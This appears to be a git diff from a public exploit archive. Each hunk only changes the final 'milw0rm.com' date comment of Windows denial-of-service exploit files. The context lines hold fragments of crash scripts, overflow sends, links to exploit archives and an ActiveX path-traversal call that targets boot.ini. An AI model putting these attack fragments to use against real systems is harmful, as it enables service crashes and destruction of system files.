fileHandle.close() -# milw0rm.com [2008-04-16] +# milw0rm.com [2008-04-16] \ No newline at end of file diff --git a/platforms/windows/dos/5460.html b/platforms/windows/dos/5460.html index ea388c6ab..55e038c2b 100755 --- a/platforms/windows/dos/5460.html +++ b/platforms/windows/dos/5460.html @@ -14,4 +14,4 @@ obj.WksPictureInterface = num; </body> </html> -# milw0rm.com [2008-04-17] +# milw0rm.com [2008-04-17] \ No newline at end of file diff --git a/platforms/windows/dos/5472.py b/platforms/windows/dos/5472.py index b59f7b1b3..9c87477db 100755 --- a/platforms/windows/dos/5472.py +++ b/platforms/windows/dos/5472.py @@ -48,4 +48,4 @@ fd.close() print "FILE CREATED\nHAVE FUN!" -# milw0rm.com [2008-04-19] +# milw0rm.com [2008-04-19] \ No newline at end of file diff --git a/platforms/windows/dos/5515.txt b/platforms/windows/dos/5515.txt index a9180f9a5..141c433b8 100755 --- a/platforms/windows/dos/5515.txt +++ b/platforms/windows/dos/5515.txt @@ -29,4 +29,4 @@ greetings! Juan Pablo Lopez Yacubian -# milw0rm.com [2008-04-28] +# milw0rm.com [2008-04-28] \ No newline at end of file diff --git a/platforms/windows/dos/5547.txt b/platforms/windows/dos/5547.txt index c65ce0e2e..98410fc87 100755 --- a/platforms/windows/dos/5547.txt +++ b/platforms/windows/dos/5547.txt @@ -23,4 +23,4 @@ One "Connection:" header with two values : (echo "GET / HTTP/1.0"; echo Nicob -# milw0rm.com [2008-05-05] +# milw0rm.com [2008-05-05] \ No newline at end of file diff --git a/platforms/windows/dos/562.c b/platforms/windows/dos/562.c index eaed19fbe..a29b76c9c 100755 --- a/platforms/windows/dos/562.c +++ b/platforms/windows/dos/562.c @@ -73,4 +73,4 @@ CopyMemory((char *)&addr.s_addr,host_ent->h_addr,host_ent->h_length); return addr.s_addr; } -// milw0rm.com [2004-09-29] +// milw0rm.com [2004-09-29] \ No newline at end of file diff --git a/platforms/windows/dos/5682.html b/platforms/windows/dos/5682.html index eb0264395..283878cb8 100755 --- a/platforms/windows/dos/5682.html +++ b/platforms/windows/dos/5682.html @@ -14,4 +14,4 @@ filePath="..\..\..\..\..\..\..\boot.ini" UmxEventCliLib.SaveToFile filePath </script></html> -# milw0rm.com [2008-05-28] +# milw0rm.com [2008-05-28] \ No newline at end of file diff --git a/platforms/windows/dos/5687.txt b/platforms/windows/dos/5687.txt index c439086dc..64755a70a 100755 --- a/platforms/windows/dos/5687.txt +++ b/platforms/windows/dos/5687.txt @@ -6,4 +6,4 @@ greetz to : Deimos, benjilenoob, Berga , http://spiritofhack.net/ Poc : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5687.pdf (2008-HI2.pdf) -# milw0rm.com [2008-05-29] +# milw0rm.com [2008-05-29] \ No newline at end of file diff --git a/platforms/windows/dos/5709.pl b/platforms/windows/dos/5709.pl index ae20d0273..d7987812f 100755 --- a/platforms/windows/dos/5709.pl +++ b/platforms/windows/dos/5709.pl @@ -34,4 +34,4 @@ print "Buffer Overflow Successfull\n"; $ssh2->disconnect(); exit; -# milw0rm.com [2008-05-31] +# milw0rm.com [2008-05-31] \ No newline at end of file diff --git a/platforms/windows/dos/571.c b/platforms/windows/dos/571.c index c29967818..a858a84c7 100755 --- a/platforms/windows/dos/571.c +++ b/platforms/windows/dos/571.c @@ -204,4 +204,4 @@ u_long resolv(char *host) { } #endif -// milw0rm.com [2004-10-10] +// milw0rm.com [2004-10-10] \ No newline at end of file diff --git a/platforms/windows/dos/5718.pl b/platforms/windows/dos/5718.pl index 5280ad4af..7570a5c83 100755 --- a/platforms/windows/dos/5718.pl +++ b/platforms/windows/dos/5718.pl @@ -25,4 +25,4 @@ my $res = $connect->request($req); print $res->as_string; print "Exploit successfull\n"; -# milw0rm.com [2008-06-01] +# milw0rm.com [2008-06-01] \ No newline at end of file diff --git a/platforms/windows/dos/5727.pl b/platforms/windows/dos/5727.pl index fa25e6040..7e44d5284 100755 --- a/platforms/windows/dos/5727.pl +++ b/platforms/windows/dos/5727.pl @@ -43,4 +43,4 @@ print $res->as_string; # "If in time like these you can talk about individual freedom, you're probably a terrorist" -# milw0rm.com [2008-06-02] +# milw0rm.com [2008-06-02] \ No newline at end of file diff --git a/platforms/windows/dos/578.pl b/platforms/windows/dos/578.pl index 0e4f24973..9012ee0a3 100755 --- a/platforms/windows/dos/578.pl +++ b/platforms/windows/dos/578.pl @@ -35,4 +35,4 @@ print sock.recv(512) sock.send("xpat From 1-9 %s \x0d\x0a" % pat) -# milw0rm.com [2004-10-16] +# milw0rm.com [2004-10-16] \ No newline at end of file diff --git a/platforms/windows/dos/5817.pl b/platforms/windows/dos/5817.pl index ff2581e94..e249479d6 100755 --- a/platforms/windows/dos/5817.pl +++ b/platforms/windows/dos/5817.pl @@ -35,4 +35,4 @@ while($client = $sock->accept()) { print "Crashed Client!\n"; } -# milw0rm.com [2008-06-14] +# milw0rm.com [2008-06-14] \ No newline at end of file diff --git a/platforms/windows/dos/5843.html b/platforms/windows/dos/5843.html index ac8d38efa..eb4c0e52e 100755 --- a/platforms/windows/dos/5843.html +++ b/platforms/windows/dos/5843.html @@ -16,4 +16,4 @@ P2P Foxy Out of memory Exploit 000000000000000000000000000000000000000000000000000000 0000000000000000000000000'>Music.wmv</a> -# milw0rm.com [2008-06-17] +# milw0rm.com [2008-06-17] \ No newline at end of file diff --git a/platforms/windows/dos/585.pl b/platforms/windows/dos/585.pl index 3f7e1c9db..b90be737a 100755 --- a/platforms/windows/dos/585.pl +++ b/platforms/windows/dos/585.pl @@ -36,4 +36,4 @@ syswrite($socket,$req,length($req)); close $socket; -# milw0rm.com [2004-10-20] +# milw0rm.com [2004-10-20] \ No newline at end of file diff --git a/platforms/windows/dos/5851.txt b/platforms/windows/dos/5851.txt index 50bf265fa..4726fbdd6 100755 --- a/platforms/windows/dos/5851.txt +++ b/platforms/windows/dos/5851.txt @@ -81,4 +81,4 @@ except: print " -------------------------------------" print "\nAN ERROR OCCURS DURING FILE CREATION!" -# milw0rm.com [2008-06-18] +# milw0rm.com [2008-06-18] \ No newline at end of file diff --git a/platforms/windows/dos/5918.pl b/platforms/windows/dos/5918.pl index 58aa6ba8d..bd19b009a 100755 --- a/platforms/windows/dos/5918.pl +++ b/platforms/windows/dos/5918.pl @@ -38,4 +38,4 @@ sub usage exit; } -# milw0rm.com [2008-06-23] +# milw0rm.com [2008-06-23] \ No newline at end of file diff --git a/platforms/windows/dos/593.pl b/platforms/windows/dos/593.pl index 23b360cbc..3ad37b563 100755 --- a/platforms/windows/dos/593.pl +++ b/platforms/windows/dos/593.pl @@ -36,4 +36,4 @@ $ftp->quit; print "SerVer Has Been Dosed,will be Down if LogFile is or will be viewed!\n"; -# milw0rm.com [2004-10-24] +# milw0rm.com [2004-10-24] \ No newline at end of file diff --git a/platforms/windows/dos/594.pl b/platforms/windows/dos/594.pl index 31805f892..c3a9ddd46 100755 --- a/platforms/windows/dos/594.pl +++ b/platforms/windows/dos/594.pl @@ -29,4 +29,4 @@ $smtp = Net::SMTP->new('localhost', print "\nTarGet Has BeeN D.o.Sed,use Exploit at Least 3 times \n"; print "and then check if Server aLiVe!\n\n"; -# milw0rm.com [2004-10-24] +# milw0rm.com [2004-10-24] \ No newline at end of file diff --git a/platforms/windows/dos/5968.py b/platforms/windows/dos/5968.py index b9f7abda5..dcdaa9fe9 100755 --- a/platforms/windows/dos/5968.py +++ b/platforms/windows/dos/5968.py @@ -22,4 +22,4 @@ s.send('A001 APPEND ' + buffer + '\r\n') s.recv(1024) s.close() -# milw0rm.com [2008-06-30] +# milw0rm.com [2008-06-30] \ No newline at end of file diff --git a/platforms/windows/dos/599.py b/platforms/windows/dos/599.py index 0a2502abb..f2a03c00d 100755 --- a/platforms/windows/dos/599.py +++ b/platforms/windows/dos/599.py @@ -30,4 +30,4 @@ try: except: print "\nCould not connect to sever!" -# milw0rm.com [2004-10-26] +# milw0rm.com [2004-10-26] \ No newline at end of file diff --git a/platforms/windows/dos/603.c b/platforms/windows/dos/603.c index 96cb9e7d4..7cdad6711 100755 --- a/platforms/windows/dos/603.c +++ b/platforms/windows/dos/603.c @@ -271,4 +271,4 @@ u_long resolv(char *host) { } #endif -// milw0rm.com [2004-10-27] +// milw0rm.com [2004-10-27] \ No newline at end of file diff --git a/platforms/windows/dos/604.c b/platforms/windows/dos/604.c index 4f36f5842..4bace3e18 100755 --- a/platforms/windows/dos/604.c +++ b/platforms/windows/dos/604.c @@ -252,4 +252,4 @@ u_long resolv(char *host) { } #endif -// milw0rm.com [2004-03-03] +// milw0rm.com [2004-03-03] \ No newline at end of file diff --git a/platforms/windows/dos/605.c b/platforms/windows/dos/605.c index b92f9be2a..2c29e5a1f 100755 --- a/platforms/windows/dos/605.c +++ b/platforms/windows/dos/605.c @@ -260,4 +260,4 @@ int timeout(int sock) { -// milw0rm.com [2004-03-03] +// milw0rm.com [2004-03-03] \ No newline at end of file diff --git a/platforms/windows/dos/6059.pl b/platforms/windows/dos/6059.pl index 4c2aa0161..ffead7184 100755 --- a/platforms/windows/dos/6059.pl +++ b/platforms/windows/dos/6059.pl @@ -52,4 +52,4 @@ for($i=0;$i<=$ARGV[2];$i++) print "Done. Good bye."; __END__ -# milw0rm.com [2008-07-13] +# milw0rm.com [2008-07-13] \ No newline at end of file diff --git a/platforms/windows/dos/606.c b/platforms/windows/dos/606.c index 01eaa886e..ef257ebf1 100755 --- a/platforms/windows/dos/606.c +++ b/platforms/windows/dos/606.c @@ -319,4 +319,4 @@ u_long resolv(char *host) { } #endif -// milw0rm.com [2004-03-01] +// milw0rm.com [2004-03-01] \ No newline at end of file diff --git a/platforms/windows/dos/607.c b/platforms/windows/dos/607.c index 0c83924fc..12bc960a3 100755 --- a/platforms/windows/dos/607.c +++ b/platforms/windows/dos/607.c @@ -388,4 +388,4 @@ u_long resolv(char *host) { -// milw0rm.com [2004-03-02] +// milw0rm.com [2004-03-02] \ No newline at end of file diff --git a/platforms/windows/dos/6072.html b/platforms/windows/dos/6072.html index 3ee9864e2..698d665ee 100755 --- a/platforms/windows/dos/6072.html +++ b/platforms/windows/dos/6072.html @@ -14,4 +14,4 @@ target.c arg1 </script> </body></html> -# milw0rm.com [2008-07-14] +# milw0rm.com [2008-07-14] \ No newline at end of file diff --git a/platforms/windows/dos/6077.c b/platforms/windows/dos/6077.c index 709295a2e..a5b7f5011 100755 --- a/platforms/windows/dos/6077.c +++ b/platforms/windows/dos/6077.c @@ -70,4 +70,4 @@ int main(int argc, char* argv[]){ return(EXIT_SUCCESS); } -// milw0rm.com [2008-07-15] +// milw0rm.com [2008-07-15] \ No newline at end of file diff --git a/platforms/windows/dos/6083.html b/platforms/windows/dos/6083.html index c1c5ef8b4..d6a2684b0 100755 --- a/platforms/windows/dos/6083.html +++ b/platforms/windows/dos/6083.html @@ -54,4 +54,4 @@ ESP 0013E804 -> 0000021A </script> <input type=button onclick=Boom() value='Boom?'> -# milw0rm.com [2008-07-15] +# milw0rm.com [2008-07-15] \ No newline at end of file diff --git a/platforms/windows/dos/6090.html b/platforms/windows/dos/6090.html index b073edfc7..524c81af3 100755 --- a/platforms/windows/dos/6090.html +++ b/platforms/windows/dos/6090.html @@ -12,4 +12,4 @@ classid=clsid:72B15B25-2EC8-4CDD-B284-C89A5F8E8D5F></object> </body> </html> -# milw0rm.com [2008-07-17] +# milw0rm.com [2008-07-17] \ No newline at end of file diff --git a/platforms/windows/dos/61.c b/platforms/windows/dos/61.c index 5c4b1ba59..1e536a486 100755 --- a/platforms/windows/dos/61.c +++ b/platforms/windows/dos/61.c @@ -79,4 +79,4 @@ exit(1); -// milw0rm.com [2003-07-21] +// milw0rm.com [2003-07-21] \ No newline at end of file diff --git a/platforms/windows/dos/6103.pl b/platforms/windows/dos/6103.pl index dcbc5d6a4..d61ad7ce0 100755 --- a/platforms/windows/dos/6103.pl +++ b/platforms/windows/dos/6103.pl @@ -18,4 +18,4 @@ my $evil_html = '<html><head><title>ph33r' . print $evil_html; -# milw0rm.com [2008-07-21] +# milw0rm.com [2008-07-21] \ No newline at end of file diff --git a/platforms/windows/dos/611.c b/platforms/windows/dos/611.c index 5226e0509..9fc4d67ee 100755 --- a/platforms/windows/dos/611.c +++ b/platforms/windows/dos/611.c @@ -608,4 +608,4 @@ u_long resolv(char *host) { } #endif -// milw0rm.com [2004-11-01] +// milw0rm.com [2004-11-01] \ No newline at end of file diff --git a/platforms/windows/dos/6181.php b/platforms/windows/dos/6181.php index ab677bc8f..fccf674e9 100755 --- a/platforms/windows/dos/6181.php +++ b/platforms/windows/dos/6181.php @@ -106,4 +106,4 @@ for (;;) ?> -# milw0rm.com [2008-08-01] +# milw0rm.com [2008-08-01] \ No newline at end of file diff --git a/platforms/windows/dos/6201.html b/platforms/windows/dos/6201.html index eb9c20839..f83216f8f 100755 --- a/platforms/windows/dos/6201.html +++ b/platforms/windows/dos/6201.html @@ -21,4 +21,4 @@ document.location.href=site +buf -# milw0rm.com [2008-08-04] +# milw0rm.com [2008-08-04] \ No newline at end of file diff --git a/platforms/windows/dos/6216.html b/platforms/windows/dos/6216.html index 9f501b24a..46f10663a 100755 --- a/platforms/windows/dos/6216.html +++ b/platforms/windows/dos/6216.html @@ -29,4 +29,4 @@ window.location = "http://www.google.com"; -# milw0rm.com [2008-08-10] +# milw0rm.com [2008-08-10] \ No newline at end of file diff --git a/platforms/windows/dos/6240.py b/platforms/windows/dos/6240.py index efe27a904..6d5a1ffa6 100755 --- a/platforms/windows/dos/6240.py +++ b/platforms/windows/dos/6240.py @@ -72,4 +72,4 @@ print '[+] DONE' # EoF -# milw0rm.com [2008-08-13] +# milw0rm.com [2008-08-13] \ No newline at end of file diff --git a/platforms/windows/dos/6244.js b/platforms/windows/dos/6244.js index 6d6b6808a..1d8f9dd81 100755 --- a/platforms/windows/dos/6244.js +++ b/platforms/windows/dos/6244.js @@ -9,4 +9,4 @@ for (i=1;i<=1945;i++){buf=buf+unescape("%0C");} document.write(body+buf+body1); -# milw0rm.com [2008-08-14] +# milw0rm.com [2008-08-14] \ No newline at end of file diff --git a/platforms/windows/dos/625.pl b/platforms/windows/dos/625.pl index baff31e88..f50cd695f 100755 --- a/platforms/windows/dos/625.pl +++ b/platforms/windows/dos/625.pl @@ -76,4 +76,4 @@ $ftp->quit; print "SerVer Has Been D.o.sed,will be Down if he is or will be stop being minimized!Use sploit in endless loop now,and when he will be down,will not restart again...\n"; -# milw0rm.com [2004-11-11] +# milw0rm.com [2004-11-11] \ No newline at end of file diff --git a/platforms/windows/dos/6251.txt b/platforms/windows/dos/6251.txt index dbbe6141e..17506e29b 100755 --- a/platforms/windows/dos/6251.txt +++ b/platforms/windows/dos/6251.txt @@ -248,4 +248,4 @@ int main(int argc, char *argv[]) return 0; } -# milw0rm.com [2008-08-16] +# milw0rm.com [2008-08-16] \ No newline at end of file diff --git a/platforms/windows/dos/6253.txt b/platforms/windows/dos/6253.txt index a60c8832a..bc965a5dd 100755 --- a/platforms/windows/dos/6253.txt +++ b/platforms/windows/dos/6253.txt @@ -28,4 +28,4 @@ fileHandle.write ('30216\n0\n\n\n') fileHandle.close () -# milw0rm.com [2008-08-16] +# milw0rm.com [2008-08-16] \ No newline at end of file diff --git a/platforms/windows/dos/6257.pl b/platforms/windows/dos/6257.pl index 92836bfa3..92c4842a5 100755 --- a/platforms/windows/dos/6257.pl +++ b/platforms/windows/dos/6257.pl @@ -38,4 +38,4 @@ close NEW_SOCKET; # Anyways, in the WS_FTP Home client there's still a buffer overflow in the FTP server message response ( 4100 chars answer --> done ). -# milw0rm.com [2008-08-17] +# milw0rm.com [2008-08-17] \ No newline at end of file diff --git a/platforms/windows/dos/626.c b/platforms/windows/dos/626.c index 978d9375d..a4ad8c3b7 100755 --- a/platforms/windows/dos/626.c +++ b/platforms/windows/dos/626.c @@ -385,4 +385,4 @@ main(int argc, char **argv) return 0; } -// milw0rm.com [2004-11-12] +// milw0rm.com [2004-11-12] \ No newline at end of file diff --git a/platforms/windows/dos/6262.txt b/platforms/windows/dos/6262.txt index 739af4fde..07879910d 100755 --- a/platforms/windows/dos/6262.txt +++ b/platforms/windows/dos/6262.txt @@ -157,4 +157,4 @@ BPMAniLYABIgCgxkZVSQAQawV060P4M8 =cp6A -----END PGP SIGNATURE----- -# milw0rm.com [2008-08-18] +# milw0rm.com [2008-08-18] \ No newline at end of file diff --git a/platforms/windows/dos/628.c b/platforms/windows/dos/628.c index acc4526f9..f80a6d422 100755 --- a/platforms/windows/dos/628.c +++ b/platforms/windows/dos/628.c @@ -144,4 +144,4 @@ cout<<" "< -# milw0rm.com [2008-08-27] +# milw0rm.com [2008-08-27] \ No newline at end of file diff --git a/platforms/windows/dos/6326.html b/platforms/windows/dos/6326.html index b1dad09c0..74ed5ae8e 100755 --- a/platforms/windows/dos/6326.html +++ b/platforms/windows/dos/6326.html @@ -32,4 +32,4 @@ obj1.bgcolor = obj1.fgcolor; -# milw0rm.com [2008-08-29] +# milw0rm.com [2008-08-29] \ No newline at end of file diff --git a/platforms/windows/dos/6327.html b/platforms/windows/dos/6327.html index 9f2e62fe4..4fd612444 100755 --- a/platforms/windows/dos/6327.html +++ b/platforms/windows/dos/6327.html @@ -27,4 +27,4 @@ -# milw0rm.com [2008-08-29] +# milw0rm.com [2008-08-29] \ No newline at end of file diff --git a/platforms/windows/dos/6330.txt b/platforms/windows/dos/6330.txt index 662eab9a1..ea0483185 100755 --- a/platforms/windows/dos/6330.txt +++ b/platforms/windows/dos/6330.txt @@ -23,4 +23,4 @@ This is work in progress , i am still trying to make it run arbitary code. https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6330.rar (2008-EMF_DOS.rar) -# milw0rm.com [2008-08-29] +# milw0rm.com [2008-08-29] \ No newline at end of file diff --git a/platforms/windows/dos/634.pl b/platforms/windows/dos/634.pl index 312dd7461..bf1ba26b3 100755 --- a/platforms/windows/dos/634.pl +++ b/platforms/windows/dos/634.pl @@ -21,4 +21,4 @@ for ($count=1; $count<15; $count++) print "\nMessenger crashed."; close $socks; -# milw0rm.com [2004-11-15] +# milw0rm.com [2004-11-15] \ No newline at end of file diff --git a/platforms/windows/dos/6345.html b/platforms/windows/dos/6345.html index 1e888422e..c035e81be 100755 --- a/platforms/windows/dos/6345.html +++ b/platforms/windows/dos/6345.html @@ -56,4 +56,4 @@ Dump: --> MOV EDX,[ECX+70] ---------------------------------------------------------------- -# milw0rm.com [2008-09-01] +# milw0rm.com [2008-09-01] \ No newline at end of file diff --git a/platforms/windows/dos/6353.txt b/platforms/windows/dos/6353.txt index 1d0ff4089..14d095d0d 100755 --- a/platforms/windows/dos/6353.txt +++ b/platforms/windows/dos/6353.txt @@ -28,4 +28,4 @@ www.evilfingers.com PoC Working/Exploit: Click for a demo <a href="EVIL:%">HERE</a> -# milw0rm.com [2008-09-03] +# milw0rm.com [2008-09-03] \ No newline at end of file diff --git a/platforms/windows/dos/6365.php b/platforms/windows/dos/6365.php index a9eb18116..9424c1192 100755 --- a/platforms/windows/dos/6365.php +++ b/platforms/windows/dos/6365.php @@ -18,4 +18,4 @@ http://foro.elhacker.net/bugs_y_exploits/recopilatorio_de_bugsexploits_en_google ?> -# milw0rm.com [2008-09-04] +# milw0rm.com [2008-09-04] \ No newline at end of file diff --git a/platforms/windows/dos/6372.html b/platforms/windows/dos/6372.html index 8aa2cce89..d81a42a41 100755 --- a/platforms/windows/dos/6372.html +++ b/platforms/windows/dos/6372.html @@ -36,4 +36,4 @@ Found by Shinnok http://shinnok.evonet.ro -# milw0rm.com [2008-09-05] +# milw0rm.com [2008-09-05] \ No newline at end of file diff --git a/platforms/windows/dos/6386.html b/platforms/windows/dos/6386.html index e8d12e162..13d7f73a0 100755 --- a/platforms/windows/dos/6386.html +++ b/platforms/windows/dos/6386.html @@ -33,4 +33,4 @@ http://metacortexsecurity.com -# milw0rm.com [2008-09-05] +# milw0rm.com [2008-09-05] \ No newline at end of file diff --git a/platforms/windows/dos/6391.htm b/platforms/windows/dos/6391.htm index 0c6d21a05..29a2be792 100755 --- a/platforms/windows/dos/6391.htm +++ b/platforms/windows/dos/6391.htm @@ -65,4 +65,4 @@ Xploit(); -# milw0rm.com [2008-09-06] +# milw0rm.com [2008-09-06] \ No newline at end of file diff --git a/platforms/windows/dos/6424.html b/platforms/windows/dos/6424.html index 2baf87cc6..bf2df7518 100755 --- a/platforms/windows/dos/6424.html +++ b/platforms/windows/dos/6424.html @@ -16,4 +16,4 @@ target.src = arg1 -# milw0rm.com [2008-09-11] +# milw0rm.com [2008-09-11] \ No newline at end of file diff --git a/platforms/windows/dos/6434.html b/platforms/windows/dos/6434.html index 96b0ccabe..ec57b8b1e 100755 --- a/platforms/windows/dos/6434.html +++ b/platforms/windows/dos/6434.html @@ -77,4 +77,4 @@ if (answ == true) -# milw0rm.com [2008-09-11] +# milw0rm.com [2008-09-11] \ No newline at end of file diff --git a/platforms/windows/dos/6458.c b/platforms/windows/dos/6458.c index 8b06ba8ac..aa20861c5 100755 --- a/platforms/windows/dos/6458.c +++ b/platforms/windows/dos/6458.c @@ -74,4 +74,4 @@ main (int argc, char *argv[]) return (EXIT_SUCCESS); } -// milw0rm.com [2008-09-14] +// milw0rm.com [2008-09-14] \ No newline at end of file diff --git a/platforms/windows/dos/6463.rb b/platforms/windows/dos/6463.rb index f808a32f2..0ba40e991 100755 --- a/platforms/windows/dos/6463.rb +++ b/platforms/windows/dos/6463.rb @@ -156,4 +156,4 @@ end end end -# milw0rm.com [2008-09-15] +# milw0rm.com [2008-09-15] \ No newline at end of file diff --git a/platforms/windows/dos/6474.rb b/platforms/windows/dos/6474.rb index e8d8f9d26..7d9691bd1 100755 --- a/platforms/windows/dos/6474.rb +++ b/platforms/windows/dos/6474.rb @@ -62,4 +62,4 @@ class Auxiliary::Dos::Windows::Wonderware::SuitLink < Msf::Auxiliary end end -# milw0rm.com [2008-09-17] +# milw0rm.com [2008-09-17] \ No newline at end of file diff --git a/platforms/windows/dos/649.c b/platforms/windows/dos/649.c index 3eb7b06d4..1e803540d 100755 --- a/platforms/windows/dos/649.c +++ b/platforms/windows/dos/649.c @@ -253,4 +253,4 @@ DWORD WINAPI fileList(LPVOID data){ return 0; } -// milw0rm.com [2004-11-22] +// milw0rm.com [2004-11-22] \ No newline at end of file diff --git a/platforms/windows/dos/6496.c b/platforms/windows/dos/6496.c index e52cfb9dc..dd2b29b8a 100755 --- a/platforms/windows/dos/6496.c +++ b/platforms/windows/dos/6496.c @@ -91,4 +91,4 @@ main (int argc, char **argv) return (EXIT_SUCCESS); } -// milw0rm.com [2008-09-20] +// milw0rm.com [2008-09-20] \ No newline at end of file diff --git a/platforms/windows/dos/6497.c b/platforms/windows/dos/6497.c index d1562bbe0..2c3ad6d7a 100755 --- a/platforms/windows/dos/6497.c +++ b/platforms/windows/dos/6497.c @@ -136,4 +136,4 @@ main (int argc, char **argv) return (EXIT_SUCCESS); } -// milw0rm.com [2008-09-20] +// milw0rm.com [2008-09-20] \ No newline at end of file diff --git a/platforms/windows/dos/6498.c b/platforms/windows/dos/6498.c index 364411006..3a258eec7 100755 --- a/platforms/windows/dos/6498.c +++ b/platforms/windows/dos/6498.c @@ -98,4 +98,4 @@ main (int argc, char **argv) return (EXIT_SUCCESS); } -// milw0rm.com [2008-09-20] +// milw0rm.com [2008-09-20] \ No newline at end of file diff --git a/platforms/windows/dos/65.c b/platforms/windows/dos/65.c index 745522eb1..1cc024f72 100755 --- a/platforms/windows/dos/65.c +++ b/platforms/windows/dos/65.c @@ -110,4 +110,4 @@ Exit0: return 0; } -// milw0rm.com [2003-07-25] +// milw0rm.com [2003-07-25] \ No newline at end of file diff --git a/platforms/windows/dos/651.c b/platforms/windows/dos/651.c index 7c98842aa..d8f42cdb5 100755 --- a/platforms/windows/dos/651.c +++ b/platforms/windows/dos/651.c @@ -287,4 +287,4 @@ int main(int argc, char *argv[]) { #endif -// milw0rm.com [2004-11-22] +// milw0rm.com [2004-11-22] \ No newline at end of file diff --git a/platforms/windows/dos/6515.c b/platforms/windows/dos/6515.c index 5fec1d4e2..e23d798e7 100755 --- a/platforms/windows/dos/6515.c +++ b/platforms/windows/dos/6515.c @@ -237,4 +237,4 @@ int __cdecl main(int argc, char **argv) return 0; } -// milw0rm.com [2008-09-21] +// milw0rm.com [2008-09-21] \ No newline at end of file diff --git a/platforms/windows/dos/653.c b/platforms/windows/dos/653.c index 81f5f9ec4..15293ffb9 100755 --- a/platforms/windows/dos/653.c +++ b/platforms/windows/dos/653.c @@ -363,4 +363,4 @@ u_long resolv(char *host) { -// milw0rm.com [2004-11-23] +// milw0rm.com [2004-11-23] \ No newline at end of file diff --git a/platforms/windows/dos/655.c b/platforms/windows/dos/655.c index 94f7ace36..3ec9b24a3 100755 --- a/platforms/windows/dos/655.c +++ b/platforms/windows/dos/655.c @@ -805,4 +805,4 @@ u_long resolv(char *host) { -// milw0rm.com [2004-11-24] +// milw0rm.com [2004-11-24] \ No newline at end of file diff --git a/platforms/windows/dos/6554.html b/platforms/windows/dos/6554.html index 62f795fc8..60bc56e20 100755 --- a/platforms/windows/dos/6554.html +++ b/platforms/windows/dos/6554.html @@ -37,4 +37,4 @@ Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)
AppleWebKit/525.13 (KHTML, l -# milw0rm.com [2008-09-24] +# milw0rm.com [2008-09-24] \ No newline at end of file diff --git a/platforms/windows/dos/6560.txt b/platforms/windows/dos/6560.txt index 83c5b4483..9b1549637 100755 --- a/platforms/windows/dos/6560.txt +++ b/platforms/windows/dos/6560.txt @@ -3,4 +3,4 @@ author: securfrog https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6560.rar (2008-crash.doc.rar) -# milw0rm.com [2008-09-25] +# milw0rm.com [2008-09-25] \ No newline at end of file diff --git a/platforms/windows/dos/6565.txt b/platforms/windows/dos/6565.txt index 2b7014f4c..a483a427b 100755 --- a/platforms/windows/dos/6565.txt +++ b/platforms/windows/dos/6565.txt @@ -22,4 +22,4 @@ Email: f3arm3d3ar@gmail.com https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6565.rar (2008-test7.rar) -# milw0rm.com [2008-09-25] +# milw0rm.com [2008-09-25] \ No newline at end of file diff --git a/platforms/windows/dos/6581.pl b/platforms/windows/dos/6581.pl index add726352..43ef4ee49 100755 --- a/platforms/windows/dos/6581.pl +++ b/platforms/windows/dos/6581.pl @@ -19,4 +19,4 @@ $ftp->login($user,$pass) || die "Cannot login ", $ftp->message; $ftp->nlst($overflow); $ftp->quit; -# milw0rm.com [2008-09-26] +# milw0rm.com [2008-09-26] \ No newline at end of file diff --git a/platforms/windows/dos/6588.txt b/platforms/windows/dos/6588.txt index 0a8076d07..616f84acb 100755 --- a/platforms/windows/dos/6588.txt +++ b/platforms/windows/dos/6588.txt @@ -1567,4 +1567,4 @@ laurent gaffié laurent.gaffie{remove_this}[at]gmail[dot]com -# milw0rm.com [2008-09-26] +# milw0rm.com [2008-09-26] \ No newline at end of file diff --git a/platforms/windows/dos/6609.html b/platforms/windows/dos/6609.html index f28fe98ba..03b771cb2 100755 --- a/platforms/windows/dos/6609.html +++ b/platforms/windows/dos/6609.html @@ -86,4 +86,4 @@ any indirect special or consequential damages. -# milw0rm.com [2008-09-28] +# milw0rm.com [2008-09-28] \ No newline at end of file diff --git a/platforms/windows/dos/6614.html b/platforms/windows/dos/6614.html index e250756f4..0108b602b 100755 --- a/platforms/windows/dos/6614.html +++ b/platforms/windows/dos/6614.html @@ -115,4 +115,4 @@ for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++) -# milw0rm.com [2008-09-28] +# milw0rm.com [2008-09-28] \ No newline at end of file diff --git a/platforms/windows/dos/6615.html b/platforms/windows/dos/6615.html index 813992724..47759d90f 100755 --- a/platforms/windows/dos/6615.html +++ b/platforms/windows/dos/6615.html @@ -88,4 +88,4 @@ XHTML+Voice Plug-in not loaded
-# milw0rm.com [2008-09-28] +# milw0rm.com [2008-09-28] \ No newline at end of file diff --git a/platforms/windows/dos/6616.txt b/platforms/windows/dos/6616.txt index de8f6b35a..65c439102 100755 --- a/platforms/windows/dos/6616.txt +++ b/platforms/windows/dos/6616.txt @@ -12,4 +12,4 @@ Access Violation [FFFFFFFF] https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6616.zip (2008-ExplorerDOS.zip) -# milw0rm.com [2008-09-28] +# milw0rm.com [2008-09-28] \ No newline at end of file diff --git a/platforms/windows/dos/6619.html b/platforms/windows/dos/6619.html index bdc2f8fb1..2c29f9ca0 100755 --- a/platforms/windows/dos/6619.html +++ b/platforms/windows/dos/6619.html @@ -41,4 +41,4 @@ ef_oval.fill.focusposition = focus_pos; -# milw0rm.com [2008-09-28] +# milw0rm.com [2008-09-28] \ No newline at end of file diff --git a/platforms/windows/dos/662.pl b/platforms/windows/dos/662.pl index 4bb216205..539e2a2f4 100755 --- a/platforms/windows/dos/662.pl +++ b/platforms/windows/dos/662.pl @@ -53,4 +53,4 @@ sub usage die $title,$Usage; } -# milw0rm.com [2004-11-28] +# milw0rm.com [2004-11-28] \ No newline at end of file diff --git a/platforms/windows/dos/664.c b/platforms/windows/dos/664.c index 5602c93e0..373ad9e6a 100755 --- a/platforms/windows/dos/664.c +++ b/platforms/windows/dos/664.c @@ -239,4 +239,4 @@ exit(1); */ -// milw0rm.com [2004-11-29] +// milw0rm.com [2004-11-29] \ No newline at end of file diff --git a/platforms/windows/dos/6647.c b/platforms/windows/dos/6647.c index 0a0877a7a..9ab1b753e 100755 --- a/platforms/windows/dos/6647.c +++ b/platforms/windows/dos/6647.c @@ -249,4 +249,4 @@ int __cdecl main(int argc, char **argv) return FALSE; } -// 